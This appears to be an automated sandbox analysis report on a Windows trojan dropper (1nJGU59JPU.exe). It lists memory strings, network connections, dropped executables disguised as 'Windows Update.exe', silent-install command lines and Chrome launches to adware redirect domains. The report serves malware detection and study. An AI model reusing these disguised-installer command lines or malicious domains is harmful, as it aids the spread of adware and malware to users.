Source: chrome.exe, 00000015.00000003.351247625.000002DEF1756000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349307421.000002DEF3D81000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350869130.000002DEF1746000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349991182.000002DEF1743000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351350827.000002DEF1757000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.359235911.000001AC606C8000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.359010078.000001AC606D2000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.357121246.000001AC606B3000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358935337.000001AC606C6000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.356125427.000001AC60678000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358077477.000001AC606D1000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.355152532.000001AC62CD1000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358283268.000001AC606C5000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358135112.000001AC606C1000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359804478.0000018BEE6EF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358735959.0000018BEE6BA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.360104540.0000018BEE707000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359853031.0000018BEE702000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.364821402.0000018BEE70B000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359113591.0000018BEE6ED000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359181332.0000018BEE71B000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.360883339.0000018BEE70A000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.357238231.0000018BF0D91000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358355792.0000018BEE6F4000.00000004.00000001.sdmp, chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000018.00000003.357238231.0000018BF0D91000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.com' equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.351247625.000002DEF1756000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350869130.000002DEF1746000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349991182.000002DEF1743000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351350827.000002DEF1757000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.com0 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.349307421.000002DEF3D81000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.com@6w equals www.youtube.com (Youtube)
Source: chrome.exe, 00000017.00000003.357121246.000001AC606B3000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.356125427.000001AC60678000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358283268.000001AC606C5000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358135112.000001AC606C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comD equals www.youtube.com (Youtube)
Source: chrome.exe, 00000017.00000003.355152532.000001AC62CD1000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comM equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.349991182.000002DEF1743000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comPXt equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.351247625.000002DEF1756000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350869130.000002DEF1746000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349991182.000002DEF1743000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comV6w equals www.youtube.com (Youtube)
Source: chrome.exe, 00000017.00000003.357121246.000001AC606B3000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.356125427.000001AC60678000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358283268.000001AC606C5000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358135112.000001AC606C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.com] equals www.youtube.com (Youtube)
Source: chrome.exe, 00000018.00000003.359804478.0000018BEE6EF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358735959.0000018BEE6BA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359113591.0000018BEE6ED000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.coma equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.349307421.000002DEF3D81000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.355152532.000001AC62CD1000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.357238231.0000018BF0D91000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comb equals www.youtube.com (Youtube)
Source: chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comp+ equals www.youtube.com (Youtube)

Source: unknown

Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.3:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.3:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:49967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:50078 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.3:50362 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.148.61:443 -> 192.168.2.3:50399 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50398 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:50646 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.143.225:443 -> 192.168.2.3:50851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.164.165:443 -> 192.168.2.3:50853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.188:443 -> 192.168.2.3:50879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.71.70:443 -> 192.168.2.3:50883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.240:443 -> 192.168.2.3:50884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:50885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.143.210:443 -> 192.168.2.3:50887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.243:443 -> 192.168.2.3:50889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:50919 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.143.210:443 -> 192.168.2.3:50920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.3:50930 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.229:443 -> 192.168.2.3:50933 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.27.252:443 -> 192.168.2.3:50935 version: TLS 1.2

DDoS:

Too many similar processes found

Source: chrome.exe

Process created: 76

System Summary:

Detected potential crypto function

Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_0040840C	0_2_0040840C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0043533C	1_2_0043533C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004813C4	1_2_004813C4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004303D0	1_2_004303D0
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0044453C	1_2_0044453C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004885E0	1_2_004885E0
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00434638	1_2_00434638
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00444AE4	1_2_00444AE4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00470C74	1_2_00470C74
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0048ED0C	1_2_0048ED0C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00430F5C	1_2_00430F5C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0045F16C	1_2_0045F16C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004451DC	1_2_004451DC
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0045B21C	1_2_0045B21C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004455E8	1_2_004455E8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00487680	1_2_00487680
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00467848	1_2_00467848
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0046989C	1_2_0046989C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00451A30	1_2_00451A30
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0043DDC4	1_2_0043DDC4
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Code function: 3_2_00007FFC086CD189	3_2_00007FFC086CD189

PE file contains strange resources

Source: 1nJGU59JPU.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1nJGU59JPU.tmp.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 1nJGU59JPU.tmp.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Vahutuqeke.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Kixysyshysy.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: installer.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: random.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: random.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: random.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: random.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: random.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: random.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Section loaded: security.dll
Source: C:\Program Files (x86)\i-record\I-Record.exe	Section loaded: swscale-2.dll
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Section loaded: security.dll

Uses 32bit PE files

Source: 1nJGU59JPU.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED

Deletes files inside the Windows folder

Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe

File deleted: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.5188.20541046

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		0_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		1_2_0045568C

Creates files inside the system directory

Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe

File created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00408C1C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00406AD4 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 0040596C appears 117 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00407904 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00403400 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00445E48 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00457FC4 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00457DB8 appears 102 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00434550 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00403494 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 004533B8 appears 98 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00446118 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00403684 appears 229 times

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0042F594 NtdllDefWindowProc_A,	1_2_0042F594
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00423B94 NtdllDefWindowProc_A,	1_2_00423B94
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004125E8 NtdllDefWindowProc_A,	1_2_004125E8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00479380 NtdllDefWindowProc_A,	1_2_00479380
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0045763C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,	1_2_0045763C

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Code function: 1_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,

1_2_0042E944

PE file contains executable resources (Code or Archives)

Source: 1nJGU59JPU.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 1nJGU59JPU.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: 1nJGU59JPU.tmp.0.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped

Sample file is different than original file name gathered from version info

Source: 1nJGU59JPU.exe, 00000000.00000003.271891331.0000000002570000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs 1nJGU59JPU.exe
Source: 1nJGU59JPU.exe, 00000000.00000003.272027551.0000000002460000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs 1nJGU59JPU.exe

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

File created: C:\Users\user\AppData\Local\Programs

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@226/292@152/78

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\user\Desktop\1nJGU59JPU.exe

Code function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,

0_2_00409C34

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe

File created: C:\Program Files (x86)\windows multimedia platform\ZHunuhebaqu.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: 1nJGU59JPU.exe	Virustotal: Detection: 25%
Source: 1nJGU59JPU.exe	Metadefender: Detection: 31%
Source: 1nJGU59JPU.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\1nJGU59JPU.exe

File read: C:\Users\user\Desktop\1nJGU59JPU.exe

Jump to behavior

Source: C:\Users\user\Desktop\1nJGU59JPU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\1nJGU59JPU.exe "C:\Users\user\Desktop\1nJGU59JPU.exe"
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp "C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp" /SL5="$22016E,506086,422400,C:\Users\user\Desktop\1nJGU59JPU.exe"
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Process created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe "C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe" /S /UID=rec7
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe"
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe "C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe"
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe "C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe" /VERYSILENT
Source: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe	Process created: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp "C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp" /SL5="$50038,5808768,66560,C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe" /VERYSILENT
Source: unknown	Process created: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe "C:\Program Files (x86)\windows multimedia platform\ZHunuhebaqu.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe "C:\Program Files (x86)\windows multimedia platform\ZHunuhebaqu.exe"
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process created: C:\Program Files (x86)\i-record\I-Record.exe "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process created: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe "C:\Program Files (x86)\windows multimedia platform\Windows Update.exe"
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,9627623661114225042,16842326924946872670,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3
